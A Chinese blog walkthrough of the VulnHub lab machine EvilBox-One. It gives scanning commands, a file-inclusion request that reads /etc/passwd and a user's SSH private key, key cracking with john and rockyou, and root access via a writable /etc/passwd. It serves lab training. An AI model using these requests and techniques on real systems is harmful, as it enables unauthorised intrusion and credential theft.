vulnhub靶机EvilBox---One

最新推荐文章于 2024-09-02 16:33:09 发布
最新推荐文章于 2024-09-02 16:33:09 发布
阅读量306 收藏
点赞数
分类专栏: vulnhub 文章标签: 网络安全 web安全 网络攻击模型 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/132640224
版权

靶机地址:EvilBox: One ~ VulnHub

主机发现

arp-scan -l

端口扫描

nmap --min-rate 10000 -p- 192.168.21.153

扫描端口信息

nmap -sV -sT -O -p22,80 192.168.21.153

漏洞扫描

nmap --script=vuln -p22,80 192.168.21.153

访问网站

再去看看robots.txt

之前扫描到的/secret/去看一下

扫描网站目录

访问之后发现全白

什么都没有,接着扫漏洞

利用nikto进行漏洞扫描

nikto -host 192.168.21.153

敏感目录

nikto -host http://192.168.21.153/dvwa

正常的但是发现了一点点不对劲的位置

这里我用nc拿到数据包的时候发现这里有返回值且不是我最开始访问的时候的白色,这里一定有一个参数接受我的变量,直接抓包看变量名

ffuf -w /root/Desktop/list -u http://192.168.21.153/secret/evil.php?FUZZ=../robots.txt -fs 0

查看一下这里是否有文件包含

192.168.21.153/secret/evil.php?command=/../../etc/passwd

确认有这个漏洞

发现新用户

mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

想直接找到ssh密钥文件能直接登入

192.168.21.153/secret/evil.php?command=../../../../../../../../../home/mowree/.ssh/id_rsa

只能hash碰撞

Rsa密钥拿到,下载下来进行hash碰撞

修改权限

Chmodd 600 hash(只能是600的权限)

python3 ssh2john.py /root/Desktop/hash > /root/Desktop/idrsa

john idrsa --wordlist=/usr/share/wordlists/rockyou.txt

登入mowree账户

ssh mowree@192.168.21.153 -i idrsa

信息收集

想着去找漏洞但是没有找到

只能换方式

find / -user root -perm 2 >/dev/null

这个页面欸有找到

只能去看看passwd有没有权限

先生成一个密码(我用的himobrine)

修改root密码进行登入

(登入之后才查看的密码,当时忘记截图了)

查看flag

结束

himobrinehacken
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机EvilBox-One
qq_48904485的博客
01-20 895
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机EvilBox-One(10.0.2.25)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/evilbox-one,736/
Vulnhub靶机_EVILBOX: ONE
学术渣渣的博客
10-25 672
文章目录靶机信息渗透过程获取靶机IP端口扫描网站目录扫描 靶机信息 下载地址:http://www.vulnhub.com/entry/evilbox-one,736/ 难易程度:简单 渗透过程 获取靶机IP 这个靶机启动后会显示IP地址:192.168.1.103 用主机扫描也可以扫到: arp-scan -l 端口扫描 这里开放了两个端口:22,80。 nmap -A -T4 -p 1-65535 192.168.1.103 网站目录扫描 首先扫描一下特殊文件,这里扫描到一个robots.tx
Vulnhub靶机EVILBOX_ ONE(很详细)
LainWith的博客
07-08 3065
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
Evilbox-One靶机打靶过程与思路
qq_52610024的博客
04-21 2549
没有有效信息,思考是否可能有写入权限,php//filter/write=convert.base64-decode/resource=test.php&txt=MTIz。-wval.txtVAL-uhttp//10.0.2.26/secret/evil.php?/home/mowree/.ssh/id_rsa。查找suid文件权限find/-perm/40002>/dev/null4000是suid权限位置,后面是将报错文件放置到空白目录中。/etc/passswd。...
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5651
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
Vulnhub-EvilBox---One
qq_52579508的博客
06-28 587
目标 主机 : 192.168.145.134attack 主机 :192.168.145.130。
EVILBOX---ONE 打靶流程
qq_53733257的博客
11-24 1048
EVILBOX---ONE 打靶流程
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8442
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Web安全之XSS跨站脚本攻击
good good study day day up
08-29 1893
XSS漏洞简介、原理、攻击方式、危害、常用标签、绕过技巧、防御
【补-网络安全】日常运维(二)终端端口占用排查
最新发布
Ryoujou的博客
09-02 139
端口占用及开放情况
网络安全售前入门10安全服务——安全培训服务
打工人
09-02 722
对企业人员进行安全意识培训,提高企业人员的安全意识。应对信息安全风险能力、信息系统安全运维水平,降低信息系统安全风险的重要工作,是《网络安全法》的合规性要求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1306
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
人工智能在网络安全领域的应用探索
A526847的博客
08-29 1184
随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。
信息安全--(四)网络安全体系与安全模型(二)
m0_60936698的博客
08-30 969
■ 等级保护分为五个:第一级(用户自主保护级)、第二级(系统审计保护级)、第三级(安全标记保护级)、第四级(结构化保护级)、第五级(访问验证保护级)。■ ①扩大了对象方位,将云计算、移动互联、物联网、工业控制系统等列入标准范围,构成了“网络安全 通用要求+新型应用的网络安全扩展要求”的要求内容。■ 管理手段:包括安全评估、安全监管、应急响应、安全协调、安全标准和规范、保密检查、认证和访 问控制等;管理目标: (大)政治、经济、文化、国防安全等,(小)网络系统的保密、可用、可控等。·监督安全项目的实施;
网络安全宗旨和目标
网络研究观
09-02 378
网络安全涉及网络和相关数据及信息的保护与保障。它已从物理技术发展到防病毒和反网络钓鱼平台等软件方法。
网络安全售前入门07安全服务——主机漏洞扫描服务方案
打工人
08-30 616
漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。
Oracle 网络安全产品安全认证检索
In-Memory Computing Technology
08-30 472
列入《网络关键设备和网络安全专用产品目录》的网络安全专用产品应当按照《信息安全技术网络安全专用产品安全技术要求》等相关国家标准的强制性要求,由具备资格的机构安全认证合格或者安全检测符合要求后,方可销售或者提供。Oracle Zero Data Loss Recovery Appliance (ZDLRA)属于此类,ZDLRA RA23于2024年7月通过网络安全专用产品安全检测,标志着这款产品完全符合中国政府对于安全产品的要求,包括技术及供应链安全要求。检测结果已在网信办官网上发布。
网络安全-安全渗透简介和安全渗透环境准备
weixin_57370131的博客
08-26 1760
安全渗透简介和安全渗透测试环境准备。
EvilBox---One
09-04
- *2* *3* [看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One](https://blog.csdn.net/Aluxian_/article/details/124695560)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值